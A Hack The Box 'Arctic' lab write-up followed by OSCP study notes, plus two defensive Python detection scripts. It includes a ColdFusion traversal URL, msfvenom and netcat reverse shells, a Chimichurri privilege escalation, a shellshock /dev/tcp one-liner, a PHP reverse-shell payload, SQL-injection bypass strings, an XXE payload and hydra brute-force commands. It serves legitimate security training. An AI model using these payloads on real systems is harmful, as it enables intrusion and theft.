HTB – Arctic

Today we are going to solve another CTF challenge, “Arctic”, which is categorised as a retired lab presented by Hack the Box for online penetration testing practice. Solving the challenges in this lab is not that easy unless you have some knowledge of vulnerability assessment. Let’s start and learn how to analyse a vulnerability in a network and then exploit it to retrieve the desired information.

Level: Intermediate

Task: find user.txt and root.txt file in the victim’s machine.

Since these labs are accessible online, they have static IPs. The IP of Arctic is 10.10.10.11, so let’s start with nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.11
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-19 19:46 W. Europe Summer Time
Nmap scan report for 10.10.10.11
Host is up (0.033s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.40 seconds

Right off the bat port 8500 looks interesting. Let’s have a look in the browser.

The administrator directory gives us a login for ColdFusion 8.

Exploitation

After a quick search online we find that ColdFusion 8 is vulnerable to directory traversal. ColdFusion 8 also stores the administrator password hash locally in a file called password.properties, so we can grab that hash through the directory traversal using the following URL:

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

And we get this output in the browser.

So we have a hash of 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03.

Using hash-identifier we see the hash is most likely SHA-1.

root@kali:~/htb/arctic# hash-identifier
   #########################################################################
   #	 __  __ 		    __		 ______    _____	   #
   #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
   #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R #
   #							www.Blackploit.com #
   #						       Root@Blackploit.com #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03

Possible Hashs:
[+]  SHA-1

A quick Google search yields the cracked password: happyday. It is usually easiest to start there before firing up hashcat.

Once logged in, there is an area under the Debugging &amp; Logging category that allows us to upload files via Scheduled Tasks.

The scheduled task setup gives you the ability to download a file from a webserver and save the output locally. Under Mappings, we can verify the CFIDE path, so we know where we can save a shell.

At this point we need to generate a shell. We could upload a cfexec.cfm shell (located in /usr/share/webshells/cfm on Kali) to get command execution or we can get a full shell by uploading a JSP shell since ColdFusion will serve and run JSP files.

To generate a JSP shell, we use msfvenom and set our parameters accordingly.

root@kali:~/htb/arctic# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f raw > shell.jsp
Payload size: 1496 byte

Now that we have our shell created, let’s serve up the file from Kali using Python’s SimpleHTTPServer.

root@kali:~/htb/arctic# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Inside the ColdFusion admin console we configure three parameters for the scheduled task.

  • Set the URL to our webserver hosting the JSP shell
  • Check the box for Save output to a file
  • Set File to C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

After submitting we run the task on demand under Actions, and we can see the 200 response on our Python HTTP server.

Fire up a netcat listener and we can now browse to our shell at http://10.10.10.11:8500/CFIDE/shell.jsp

root@kali:~/htb/arctic# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49212
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami & hostname
whoami & hostname
arctic\tolis
arctic

And we can grab the user.txt flag on tolis’ desktop.

Privilege Escalation

Tolis doesn’t seem to be an administrator on the system, so we will need to escalate. One of the first things I do for privilege escalation on Windows is grab system information, so that we can identify the OS and also see if it’s missing any patches.

C:\>systeminfo
systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00477-001-0000421-84900
Original Install Date:     22/3/2017, 11:09:45   
System Boot Time:          29/12/2017, 3:34:21   
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2600 Mhz
                           [02]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2600 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.024 MB
Available Physical Memory: 88 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 1.085 MB
Virtual Memory: In Use:    963 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11

From here we identify that the box is running Server 2008 R2 and, according to the output under Hotfix(s), has no patches installed. Great! Let’s see what exploits we can find. You can either Google, use Exploit-DB or searchsploit, or, for Windows, use something called Windows Exploit Suggester, which I like because it makes life easy. I won’t go into details on how to use it; check its GitHub page for usage and what you can feed into it.
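The check done by eye above, reading the OS version and the Hotfix(s) entry out of systeminfo, written as a small parser that turns the raw output into a patch-state summary a defender can run across many hosts. This is an added example, not code from the writeup or from Windows Exploit Suggester; the first sample is trimmed from the systeminfo output above, the second is constructed with placeholder KB numbers.

```python
import re

# Trimmed copy of the systeminfo output captured in the Arctic shell above.
ARCTIC_SYSTEMINFO = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Constructed sample of a host that lists hotfixes; KB numbers are placeholders.
PATCHED_SYSTEMINFO = """\
Host Name:                 EXAMPLE
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB0000001
                           [02]: KB0000002
"""

FIELD_RE = re.compile(r"^(?P<key>[^:\s][^:]*):\s*(?P<value>.*)$")  # "Key:   value"
ITEM_RE = re.compile(r"^\s+\[\d+\]:\s*(?P<item>\S.*?)\s*$")         # indented "[NN]: item"
BUILD_RE = re.compile(r"Build (\d+)")


def parse_systeminfo(text):
    """Return (fields, items): top-level Key: value pairs, and the [NN]: entries
    that belong to list-valued keys such as Hotfix(s) or Network Card(s)."""
    fields, items, current = {}, {}, None
    for line in text.splitlines():
        item = ITEM_RE.match(line)
        if item and current:
            items.setdefault(current, []).append(item.group("item"))
            continue
        field = FIELD_RE.match(line)
        if field:
            current = field.group("key").strip()
            fields[current] = field.group("value").strip()
    return fields, items


def hotfix_audit(text):
    """Summarise OS identity and patch state from raw systeminfo output."""
    fields, items = parse_systeminfo(text)
    build = BUILD_RE.search(fields.get("OS Version", ""))
    hotfixes = items.get("Hotfix(s)", [])
    return {
        "host": fields.get("Host Name"),
        "os": fields.get("OS Name"),
        "build": int(build.group(1)) if build else None,
        "hotfixes": hotfixes,
        # "N/A" or no [NN] entries both mean nothing has been installed
        "unpatched": fields.get("Hotfix(s)", "").upper() == "N/A" or not hotfixes,
    }
```

On the Arctic output this reports build 7600 with an empty hotfix list and `unpatched` set, which is exactly the condition that makes an unpatched 2008 R2 kernel exploit worth checking for in a patch audit.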

After looking through the output I found a few privilege escalation exploits that could work. I settled on looking into MS10-059.

https://www.exploit-db.com/exploits/14610/

The Exploit-DB download only contained source files and no compiled exe. For whatever reason the exploit has the alias Chimichurri, as referenced on Exploit-DB, so I also searched by that and was able to find a compiled exe on GitHub here. Note that normally you want to compile things yourself, but I wasn’t able to do so without installing a ton of stuff, so I decided to forgo it. Based on the source code, the exploit sends us a reverse shell when fed our IP address and desired port as parameters.

Once again we set up a Python HTTP server on Kali; to download the file to our target, a simple PowerShell script will do the trick.

C:\ColdFusion8>echo $webclient = New-Object System.Net.WebClient >>wget.ps1

C:\ColdFusion8>echo $url = "http://10.10.14.10/chimichurri.exe" >>wget.ps1

C:\ColdFusion8>echo $file = "exploit.exe" >>wget.ps1

C:\ColdFusion8>echo $webclient.DownloadFile($url,$file) >>wget.ps1

C:\ColdFusion8>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Alternatively, use certutil:

C:\ColdFusion8\runtime\bin>certutil -urlcache -split -f http://10.10.14.10/Chimichurri.exe chimichurri.exe
certutil -urlcache -split -f http://10.10.14.10/Chimichurri.exe chimichurri.exe
**** Online ****
000000 ...
017c00
CertUtil: -URLCache command completed successfully.

We verify the download, start a netcat listener, and run the exploit.

C:\ColdFusion8\runtime\bin>chimichurri.exe
chimichurri.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
C:\ColdFusion8\runtime\bin>chimichurri.exe 10.10.14.10 53
chimichurri.exe 10.10.14.10 53
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
C:\Users\jacco>nc -lvp 53
listening on [any] 53 ...
10.10.10.11: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49897: NO_DATA
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
nt authority\system

C:\ColdFusion8\runtime\bin>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>type root.txt
type root.txt
ce6*****b90

Author: Jacco Straathof

Reference used : https://www.absolomb.com/2017-12-29-HackTheBox-Arctic-Writeup/

OSCP Journey – 1st month

Date: 02 June – 30 Aug 2019
PDF: 380/380
Videos: 149/149
Exercises: 32/42
Exploited Machines: 33
Unlocked Networks: 2

The PDF contains 380 pages spread over 18 chapters. The videos run around seven and a half hours in total, spread over 149 videos. I spent around 30 hours doing the materials and exercises. There are five exercises that I decided to do later, since they need to be done on the correct machines in the lab. The videos and the PDF fit together, but the videos seem outdated and have some differences from the PDF. If you encounter any issues while following the syntax in the course materials, use the syntax from the PDF.

Exploited Machines (33):

ALICE
ALPHA
BETA
BARRY
BETHANY
BOB
BRUCE
BRETT
CORE
CORY
DJ
DOTTY
FC4
GAMMA
HELPDESK
HOTLINE
JD
JOE
KEVIN
KRAKEN
MAIL
MIKE
ORACLE
PAIN
PAYDAY
PHOENIX
RALPH
SEAN [FW-IT]
SHERLOCK
SUFFERANCE
SUSIE
TIMECLOCK [FW-DEV]
TOPHAT

My impression is that it simulates real-world scenarios. So far all the exploits have been known exploits, with no puzzles or random guessing needed. All you need is proper enumeration to spot the vulnerability.

The four hardest machines in the OSCP lab are known as The Big Four: Pain, Sufferance, Gh0st and Humble.

LEARNED:

  • Using the up arrow to get the previous command in netcat
    – use rlwrap to wrap a readline history library around your netcat program. Another option is socat, which has readline built in. For example, if you were doing a telnet with netcat you might just say:

c:\PENTEST>revshell 192.168.1.21 9090
root@kali:~/pwk# rlwrap nc -lvp 9090
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::9090
Ncat: Listening on 0.0.0.0:9090
Ncat: Connection from 192.168.1.139.
Ncat: Connection from 192.168.1.139:2675.
Microsoft Windows [Version 10.0.17134.885]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\PENTEST>whoami
whoami
LT-JACCO\jacco

COMMANDS:

root@kali:~/pwk# nmap -vv -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi 10.11.x.1-254

root@kali:~/pwk# gobuster -u http://10.11.x.x -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25 -f -s 403

root@kali:~/pwk# dirb http://10.11.x.x/cgi-bin -X .cgi
root@kali:~/pwk# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.11.0.112/443 0>&1 " http://10.11.x.x:80/cgi-bin/admin.cgi
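The two request patterns that appear on this page, the ColdFusion 8 locale traversal with a %00 terminator from the Arctic section and the shellshock User-Agent in the curl command above, written as detection rules run over web server log lines. This is an added defensive example, not part of the original notes; the log lines are constructed in combined format, and two benign requests to the same paths are included to show they do not alert.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined format). Line 1 carries the ColdFusion 8
# locale traversal URL from the Arctic section, line 2 the shellshock User-Agent
# from the curl command above; lines 3 and 4 are benign controls.
SAMPLE_LOG = r'''
10.10.14.10 - - [19/Jun/2019:19:52:10 +0200] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.10.14.10 - - [19/Jun/2019:19:55:41 +0200] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 0 "-" "() { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.11.0.112/443 0>&1 "
10.10.10.20 - - [19/Jun/2019:19:56:02 +0200] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
10.10.10.21 - - [19/Jun/2019:19:56:30 +0200] "GET /cgi-bin/admin.cgi?page=1 HTTP/1.1" 200 812 "-" "curl/7.64.0"
'''.strip()

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')     # one "../" or "..\" hop
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')    # bash function-definition prefix


def inspect_request(line):
    """Return (rule, detail) findings for one log line; [] when nothing fires."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    query = urlsplit(m.group("target")).query
    # parse_qs percent-decodes once, so %2e%2e%2f and %00 are visible here
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            hops = len(TRAVERSAL_RE.findall(value))
            if hops:
                findings.append(("path-traversal", f"{name}: {hops} traversal hops"))
            if "\x00" in value:
                findings.append(("null-byte", f"{name}: %00 terminator"))
            if "password.properties" in value.lower():
                findings.append(("coldfusion-credential-file", name))
    for header in ("ua", "referer"):
        if SHELLSHOCK_RE.search(m.group(header)):
            findings.append(("shellshock", f"function definition in {header}"))
    return findings


def scan_log(text):
    """Map each source IP to the set of rules it triggered anywhere in the log."""
    hits = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        rules = {rule for rule, _ in inspect_request(line)}
        if m and rules:
            hits.setdefault(m.group("ip"), set()).update(rules)
    return hits
```

A `200` on the traversal request, as in the first sample line, is the signal that the file was actually served and the administrator hash should be treated as exposed.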

ATTACK FTP

ftp server:

medusa -h 10.11.1.8 -u justine -P /usr/share/wordlists/rockyou.txt -M ftp 
hydra -L USER_LIST -P PASS_LIST -f -o /data/results/10.10.1.22/scans/10.10.1.22_21_ftphydra.txt -u 10.10.1.22 -s 21 ftp 

BRUTE FORCE SSH

hydra -l justine -P /usr/share/wordlists/rockyou.txt -t 10 10.11.1.8 ssh -s 22 
medusa -u root -P /usr/share/wordlists/rockyou.txt -e ns -h 10.10.1.22 -n 22 -M ssh

SQL INJECTION

sheet with the Burp Suite Intruder Module. This list is an extended version of the SQL Login Bypass Cheat Sheet of Dr. Emin İslam Tatlı (OWASP Board Member).

root' --
root' #
root'/*
root' or '1'='1
root' or '1'='1'--
root' or '1'='1'#
root' or '1'='1'/*
root'or 1=1 or ''='
root' or 1=1
root' or 1=1--
root' or 1=1#
root' or 1=1/*
root') or ('1'='1
root') or ('1'='1'--
root') or ('1'='1'#
root') or ('1'='1'/*
root') or '1'='1
root') or '1'='1'--
root') or '1'='1'#
root') or '1'='1'/*
or 1=1
or 1=1--
or 1=1#
or 1=1/*
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
" or 1=1
" or 1=1--
" or 1=1#
" or 1=1/*
1234 ' AND 1=0 UNION ALL SELECT 'root', '81dc9bdb52d04dc20036dbd8313ed055
root" --
root" #
root"/*
root" or "1"="1
root" or "1"="1"--
root" or "1"="1"#
root" or "1"="1"/*
root" or 1=1 or ""="
root" or 1=1
root" or 1=1--
root" or 1=1#
root" or 1=1/*
root") or ("1"="1
root") or ("1"="1"--
root") or ("1"="1"#
root") or ("1"="1"/*
root") or "1"="1
root") or "1"="1"--
root") or "1"="1"#
root") or "1"="1"/*

XXE

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root><name>&xxe;</name><tel>test</tel><email>&xxe;</email><password>tst</password></root>

LFI

See the source of any PHP file:

http://IP/index.php?m=php://filter/convert.base64-encode/resource=index

RFI

Null Bytes

http://10.11.1.24//classes/phpmailer/class.cs_phpmailer.php?classes_dir=/etc/passwd%00
curl -s --data "<?php system('bash -i >& /dev/tcp/172.16.237.245/4545 0>&1') ?>" "http://10.10.10.10/index.php?ACS_path=php://input%00"

BRUTE FORCE WEB

hydra 192.168.30.147 -l '' -P /usr/share/wordlists/fasttrack.txt -s 8080 http-form-post "/phpliteadmin.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect:H=Cookie : PHPSESSID=bq8vrl6updklfdvv21reb8s63j"

htaccess brute force

medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/admin -T 10

TIPS:

  • You MUST do the course materials and exercises; they are a GEM. Even when you are already familiar with most of the topics, they serve as a refresher. When you attack machines in the lab, they will help you spot the “vulnerability” faster. I think it took around 30-50 hours to complete them. Sparing the time for this at the beginning can save your day later in the lab.
  • In the course materials and exercises, some of the tools are outdated and have version issues with the Offsec Kali VM. If you encounter any issues, search for the problem on the Offsec forum. Most of them are known issues, and solutions are available there.
  • Don’t just sit idle waiting for the Nmap scan to finish. Make some guesses, such as checking whether a web service is up using the browser or whether FTP, SSH or other common services are open using nc, and do some manual enumeration while waiting.
  • Nmap scripts are powerful tools to check for vulnerabilities. Get familiar with them and play with the scripts. All of the scripts are located in the /usr/share/nmap/scripts/ directory.
  • Most public exploits won’t work without modification. They usually have hardcoded IP addresses and paths. Make sure you understand the exploit and change it as necessary.
  • When compiling an exploit, compile it in an environment (OS/kernel) as close as possible to the target machine. If the target machine doesn’t have a compiler, the workaround could be to download the same OS as the target machine, install it and compile there, but that takes a lot of time. I found that some Vulnhub VMs similar to the OSCP machines can be used to compile exploits too. I am using Kioptrix machines to compile old exploits, and it has worked so far, saving time on downloading and installing a new OS.
  • MSF is a powerful tool even though it’s restricted in the exam. Use MSF for post-exploitation; it makes your life easier when uploading and downloading files using a Meterpreter shell. It also has many post-exploitation modules that are really helpful.
  • For some of the straightforward machines, the methodology is simple: Nmap -> check the service or software version for known vulnerabilities (searchsploit or Google) -> read and understand the public exploit code -> make the necessary changes -> exploit.
  • Google anything that you find suspicious or anything that you don’t know at all.
  • Take the time to write up each machine after you exploit it. It will help you understand your current methodology better and how to improve it. Someday you may encounter similar machines and the write-up will help you. I use CherryTree to document everything.

Author: Jacco Straathof